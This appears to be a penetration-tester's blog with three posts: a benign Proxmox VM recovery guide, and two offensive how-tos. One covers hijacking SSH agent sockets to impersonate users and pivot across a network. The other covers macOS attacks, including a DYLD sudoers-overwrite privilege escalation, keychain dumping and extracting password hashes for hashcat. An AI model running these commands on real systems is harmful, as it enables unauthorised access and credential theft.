Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a fair amount of SSH tunneling in order to reach restricted systems. This is because it doesn't make sense to publicly expose SSH to the internet, or even to your general-use internal network. Instead, there might be a bastion or jump box with SSH exposed as your initial way into the environment. Once you've connected to the bastion host successfully, you can then connect to another system within that restricted network, or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems, users leverage SSH agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows the SSH client to access these credentials via a Unix stream socket. The socket makes it so the end user doesn't have to provide their credentials multiple times. The user can also request that the SSH client retain access to the socket when connecting to another system, by enabling agent forwarding with the -A flag.
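For example, a typical workflow might look something like this (the key path and bastion hostname are just placeholders):

eval "$(ssh-agent -s)" # start an agent; this exports SSH_AUTH_SOCK for the current shell
ssh-add ~/.ssh/id_rsa # cache the decrypted key in the agent
ssh -A user@bastion.example.com # forward the agent to the bastion host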

With SSH agent forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory, in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The SSH agent folder is only granted privileges for the connecting user account. To see what agents are around on a given machine, you can look through the /tmp directory with a command similar to:

ls -l /tmp | egrep 'ssh-.{10}$'

Finding SSH Agents

Agent sockets are stored in /tmp, and the reference to which agent to use is controlled entirely by the value of the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can therefore change their environment variable to point at the socket of another connected user and effectively masquerade as them on the network. In fact, you would even have access to any of the other keys the user added to the agent. Given access to a shared system's root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp | egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/<ssh-agent directory>/agent.<pid> # choose one and set it as your SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even all be combined into a single loop like the one below. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn't necessarily happen once a session is closed.

for AGENT in $(ls /tmp | egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT); echo $AGENT $(stat -c '%U' /tmp/$AGENT); timeout 10 ssh-add -l; done

Note: A lot of common programs like git, rsync, scp, etc. also allow you to leverage SSH agents. So if a given agent doesn't get you access to another system, also be sure to try and use it to authenticate against common services.
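For example, with the hijacked SSH_AUTH_SOCK exported, something like the following might work (the hosts and repository paths here are hypothetical):

git clone git@git.internal.example.com:ops/deploy-scripts.git # git over SSH will authenticate with the agent
rsync -av -e ssh user@internal-host:/var/backups/ ./loot/ # so will rsync
scp user@internal-host:/etc/passwd . # and scp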

Impersonating Users and Pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable. Then use it to try and log into other systems or services as the targeted user. It's also worth mentioning that you may be able to combine the SSH agent with port forwarding to gain access to otherwise restricted systems; I covered leveraging port forwarding in a previous post.
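As a rough sketch of that idea (the socket path, user, and hosts below are hypothetical):

export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.12345 # point the client at the hijacked agent
ssh -L 8443:restricted-host:443 targetuser@internal-jump # authenticate as the victim and forward a local port to a restricted service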

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try and connect back to the user's origin system. Most of the time, the user's public key is added to their own system's authorized_keys file for ease of access.
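A minimal version of that check (the user name and IP are placeholders):

w # see who is logged in and the source IP they are connecting from
ssh <user>@<source ip> # try riding the forwarded agent back onto their origin system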

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That, coupled with the fact that most of the time users don't maintain account separation between development and production environments, makes them prime targets for leveraging SSH agents.

Recovering Proxmox VMs from an Encrypted RAID Array

Initial Thoughts: Blog Reboot

It has been a few years since this blog has been active, or frankly seen the light of day, beyond some web caches I enabled a while back. The biggest reason for the blog phasing out was the first server I ever built (back in 2010) having a failing motherboard shortly after the birth of our first child. Now, shortly after the birth of our second child and with the abundance of free time this crisis has awarded us all, I've decided to give the blog and my good old Proxmox server a reboot.

Recovering the RAID Array

Now since I didn't have the original working hardware and I didn't retain good VM backups, I had to recover the VMs from just the encrypted drives. That meant the first step in this journey of recovering Proxmox VMs was dealing with an encrypted RAID 1 storage array.

To begin this recovery process I simply put the two "high-end" 120 GB SSD drives in the new server I built to run the latest version of Proxmox. Next we need to boot up the server and use mdadm to examine the drives and identify the RAID format.

lsblk # to list all the current block devices

mdadm -E /dev/sd[c-d] # use mdadm to examine the drives' RAID metadata

Then we can use mdadm to re-assemble the RAID. In this case, since the drives are mirrors it likely doesn't matter, but for some individuals this will likely be a required step in order to complete a full recovery.

mdadm --assemble /dev/md1 /dev/sd[c-d]1 # use mdadm to re-assemble
# the raid as md1

Decrypting LVM Structure

Next we need to decrypt the RAID device so we can access the logical volumes and mount them to begin recovering Proxmox VMs from the encrypted file system.

cryptsetup luksOpen /dev/md1 encrypted_pve # open the LUKS encrypted device

Now that the encrypted device has been opened and mapped as encrypted_pve, we can access the volume group within the encrypted partition with standard LVM commands.

vgdisplay --short # for instance just viewing the volume group

Now if you're somewhat lazy like me and doing all of this work on a new installation of Proxmox, you're likely going to have a bad time and encounter issues, because by default Proxmox wants its primary volume group to be named 'pve', and now there are two different ones with the same name. In order to avoid confusion going forward and stop our new Proxmox server from crashing, we should rename the old 'pve' volume group to something else.

vgdisplay | egrep -i "uuid|name|VG size" # use vgdisplay to 
# find the UUID of the VG

vgrename QiOPy3-WhF8-RYns-44dY-FKKN-8orV-bEi3m3 pve-old # use vgrename
# to simply rename the VG using the appropriate UUID

vgscan  # lastly we can use vgscan to reload all the vgs as a 
# sanity check

Recovering Proxmox VM Config Files

Now that we have access to the original LVM structure we can go about recovering VMs from the file system. To start this process we should mount the two logical volumes Proxmox has by default. These two would be the root and data logical volumes on our old 'pve' volume group.

mkdir /mnt/old-data /mnt/old-root #create directories to mount
# logical volumes

mount /dev/mapper/pve--old-root /mnt/old-root # mount old pve root

mount /dev/mapper/pve--old-data /mnt/old-data # mount old pve data

Here is the point where things diverge a bit depending on what version of Proxmox you're recovering from and how your VMs were originally set up. Regardless, there are really only two components to a given VM in the Proxmox world: a config file and a disk image.

To recover the VM config files in newer versions of Proxmox, you would just go into the /mnt/old-root/etc/pve/qemu-server/ directory. There you would likely see a bunch of VM configuration files named after the VM ID numbers. Generally speaking, you should be able to copy these configs over to your new Proxmox server without too much of an issue.

cd /mnt/old-root/etc/pve/qemu-server/ # go to the mounted config 
# directory

cp 100.conf /etc/pve/qemu-server/

However, if you're like me and you go looking for these VMID.conf files, they aren't on the old root filesystem. That's because in older versions of Proxmox the VM configs were stored in an SQLite database. Instead, we can use the sqlite3 command on the pve-cluster config database to view all the VM config files and extract the ones we want directly to workable config files.

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT * FROM tree;' # use sqlite3 to view all of the 
# config data in the cluster config database

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT data FROM tree WHERE name = "100.conf";' \
> /etc/pve/qemu-server/100.conf 
# use an SQL query to extract just the config file data
# we need and write it to the appropriate file

Recovering Proxmox VM Raw Disks and Disk Images

When it comes to VM disk images, they can either be raw, meaning they are logical volumes provisioned within a volume group using LVM, or disk image files like qcow2s. Regardless of which type of VM disk image you have, or if like me you had both, the path forward is basically the same: just copy it over to the appropriate place on the new server.

In the case of raw disks, all we really need to do is copy the logical volume that was provisioned in the old volume group over to the new volume group. To do this we need to create a new logical volume on the new volume group with the same size and name. Then use dd to copy over the raw data from the old logical volume to the new one.

lsblk # look at all our physical and logical devices to
# make sure we use the right devices

lvcreate -n vm-100-disk-1 -L 10G pve # Create the new logical 
# volume with the same name and size

# dd if=/dev/pve-old/vm-100-disk-1 bs=4096 of=/dev/pve/vm-100-disk-1 
# Use dd to complete a bit by bit copy of the LV data, ! Caution !

If you need to deal with VM disk image files, it's pretty straightforward as well. Just go into the old-data directory we mounted and copy the disk image files over to the new storage location. These can be in various formats like qcow2 or vmdk, but the process is the same.

mkdir /var/lib/vz/images/100 # create the folder for your VM

cp /mnt/old-data/images/100/vm-100-disk-1.qcow2  \
/var/lib/vz/images/100/vm-100-disk-1.qcow2 
# copy over the disk image to appropriate local folder

Getting VMs to Boot

At this point Proxmox should have seen the VM configuration files added to the local node's configuration directory, and the VMs should be visible in the web UI and/or via qm at the command line. The very last step in recovering Proxmox VMs is making sure your VM configuration is correct so it can boot up. I could probably do the research and a whole blog post on this topic alone, so it's kind of difficult to provide detailed examples of what could be wrong with a given configuration file. Since the configuration files are from working VMs, the most likely issues are either device statements or the boot order.

The boot order can be forced to a given device, such as ide0, with the bootdisk option. Disks are registered in the config file as device statements like 'ide0: local:vm-100-disk-1'. Make sure your device statements are correct and your cdrom is empty, such as 'ide2: none,media=cdrom', to avoid boot issues. For other errors, be sure to review the documentation or ask in the comments below.
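As a rough illustration, a minimal recovered config might look something like the following; the VM ID, storage names, and sizes are just placeholder values, not ones pulled from my actual server:

# /etc/pve/qemu-server/100.conf (illustrative example only)
bootdisk: ide0
cores: 2
ide0: local:100/vm-100-disk-1.qcow2
ide2: none,media=cdrom
memory: 2048
name: recovered-vm
ostype: l26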

Mac OSX Password Cracking

TL;DR: There are several ways to enumerate information from a Mac shell and to collect encrypted credentials for OSX password cracking.

Problem and Rationale

During a recent assessment the client had close to 10,000 Mac OSX systems throughout their global presence. All of these Macs were authenticating to Active Directory and allowed all logged-in users local admin rights via a misconfigured sudoers rule. Since this blog is lacking any real reference material specifically for OSX, I figured I would detail the information gathering and attacks I performed during the assessment.

Attacks and Methodology

The default base install of Apple OSX will allow the primary user configured on that workstation to sudo to root. When Active Directory backed authentication is used, newly logged-in users can inherit the primary user role if system defaults are not changed. This would effectively make all domain users local admins on all of the affected Macs. This is good news, since root level permission is required to pull local password hashes.
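A quick way to confirm this from a shell on one of these Macs is just the standard commands:

id # check the current user's group memberships (admin/wheel)
sudo -l # see which sudo rules apply to the current user
sudo -s # if permitted, drop into a root shell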

If the OSX systems do not use AD authentication, don't fret. By default the SSH server is enabled and it does not have any lockouts on failed login attempts. If all else fails, physical attacks still work very well against OSX. Just walk up to one and hold Command+S during boot to log into a single-user root terminal. If the system isn't using full disk encryption, you can simply copy files over to a USB flash drive.

Once you have a terminal on a Mac, it's good to check user and group memberships. Again, if the user is part of the admin group they can sudo by default, and if they are part of the wheel group they are effectively root. The following is a list of useful commands to use when in a terminal:

dscl . -list /Users #List local users
dscl . -list /Groups #List local groups
dscl . -read /Groups/<Groupname> #List local group membership
dscl . -read /Users/<username> #List a user’s information and settings

Note: The commands above all have a target of ‘.’ or ‘localhost’. If the system is connected to Active Directory, it can be queried in a similar manner. To list all Domain Admins use the following command:

dscl /Active\ Directory/<domain>/<domain.local> -read /Groups/Domain\ Admins

If the user doesn’t have sudo or root privileges, you can try to elevate to root with one of several local privilege escalation vulnerabilities. Some recent noteworthy options include CVE-2015-5889, CVE-2015-1130, or just abuse one of the Yosemite DYLD environment variables like the following:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

If the device is up to date on its patches, about all one can do is some file pillaging. The two things I would note are that AppleScript (.scpt) and property list (.plist) files are very popular in OSX. Both file types are stored to disk as binary files, and as such they need to be converted back to ASCII to be human readable.
To view the contents of an AppleScript file use a command like:

osadecompile logon.scpt

To convert a .plist file from binary to its native XML use a command like:

plutil -convert xml1 /path/to/file.plist

Note: plutil will convert files in place, so take care to make copies of files you’re working with. Alternatively, the plist files can be exfiltrated to Kali and converted to XML using the libplist-utils package. The conversion command might look something like this:

plistutil -i user.plist -o user.xml

If root level access is acquired, we can go straight after the local users’ plist files. Each user’s plist file contains their individual settings and their encrypted credentials. The directory that contains all local users’ plist files is /private/var/db/dslocal/nodes/Default/users/.
If another user is currently logged into the system, that user’s keychain can be dumped by root. This will provide clear text access to all saved credentials, iCloud keys, the FileVault encryption key, and the user’s clear text password. To dump the user’s keychain use a security command like:

security dump-keychain -d /Users/<user>/Library/Keychains/login.keychain

WARNING: In newer versions of OSX this will generate a dialog box on the user’s screen. This will obviously alert the user and only produce usable output if the user accepts.

OSX Password Cracking

There are several ways to gain access to the encrypted shadow data, which is needed to conduct OSX password cracking. Two of them have already been mentioned above. If you have root access, perform a dscl . -read /Users/<user>, or grab the user’s plist file from /private/var/db/dslocal/nodes/Default/users/ and convert it to XML; either way there will be an XML element called ShadowHashData. The ShadowHashData is a base64 encoded blob containing a plist file with the base64 encoded entropy, salt, and iterations within it.
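For instance, if you only want that one attribute, dscl should let you read it directly (the user name is a placeholder):

dscl . -read /Users/<user> ShadowHashData # dump just the ShadowHashData blob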

Note: Before the base64 can be cleanly decoded in each of these steps, the XML elements, spaces, and line breaks will need to be removed manually.
The first step is to extract the plist file from the shadow hash data and convert it back to XML. This can be done with the following commands:

echo "<hash data>" | base64 -D > shadowhash
file shadowhash
plutil -convert xml1 shadowhash

Next, clean up and convert the base64 encoded entropy to hex format. This can be done with the following commands:

echo "<entropy data>" | base64 -D > entropy
file entropy
xxd entropy

Third, clean up and convert the base64 encoded salt to hex format. This can be completed with the following set of commands:

echo "<salt data>" | base64 -D > salt
file salt
xxd salt

Next we can put all the hex value strings together into the following hashcat format (mode 7100).

$ml$<iterations>$<salt>$<entropy>
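If you'd rather not paste hex strings around by hand, a small sketch like the one below can assemble the hash line, assuming the entropy and salt files produced in the previous steps and the iteration count pulled from the converted plist:

ITER=<iterations> # iteration count taken from the converted plist
SALT=$(xxd -p salt | tr -d '\n') # plain hex of the salt
ENTROPY=$(xxd -p entropy | tr -d '\n') # plain hex of the entropy
echo "\$ml\$${ITER}\$${SALT}\$${ENTROPY}" > hash.txt # write the hashcat 7100 formatted hash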

Lastly put that baby in hashcat as OSX v10.8/v10.9 and watch it burn.

./hashcat-cli64.app -m 7100 hash.txt wordlist.txt

As Always:

ICBfICAgXyAgICAgICAgICAgIF8gICAgICBfX19fXyBfICAgICAgICAgICAgX19fXyAgXyAgICAg
ICAgICAgICAgICAgIF8gICANCiB8IHwgfCB8IF9fIF8gIF9fX3wgfCBfXyB8XyAgIF98IHxfXyAg
IF9fXyAgfCAgXyBcfCB8IF9fIF8gXyBfXyAgIF9fX3wgfF8gDQogfCB8X3wgfC8gX2AgfC8gX198
IHwvIC8gICB8IHwgfCAnXyBcIC8gXyBcIHwgfF8pIHwgfC8gX2AgfCAnXyBcIC8gXyBcIF9ffA0K
IHwgIF8gIHwgKF98IHwgKF9ffCAgIDwgICAgfCB8IHwgfCB8IHwgIF9fLyB8ICBfXy98IHwgKF98
IHwgfCB8IHwgIF9fLyB8XyANCiB8X3wgfF98XF9fLF98XF9fX3xffFxfXCAgIHxffCB8X3wgfF98
XF9fX3wgfF98ICAgfF98XF9fLF98X3wgfF98XF9fX3xcX198